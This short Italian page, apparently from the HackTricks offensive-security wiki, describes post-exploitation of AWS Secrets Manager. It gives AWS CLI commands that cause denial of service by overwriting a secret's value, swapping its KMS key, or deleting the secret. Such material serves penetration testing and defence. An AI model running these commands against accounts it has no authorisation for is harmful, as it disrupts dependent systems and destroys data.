# AWS - Secrets Manager Post Exploitation {{#include ../../../banners/hacktricks-training.md}} ## Secrets Manager Per ulteriori informazioni controlla: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} ### Leggi Segreti I **segreti stessi sono informazioni sensibili**, [controlla la pagina privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) per imparare come leggerli. ### DoS Cambia Valore Segreto Cambiando il valore del segreto potresti **DoS tutto il sistema che dipende da quel valore.** > [!WARNING] > Nota che i valori precedenti sono anche memorizzati, quindi è facile tornare al valore precedente. ```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS Cambiare la chiave KMS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Eliminazione del Segreto Il numero minimo di giorni per eliminare un segreto è 7 ```bash aws secretsmanager delete-secret \ --secret-id MyTestSecret \ --recovery-window-in-days 7 ``` {{#include ../../../banners/hacktricks-training.md}}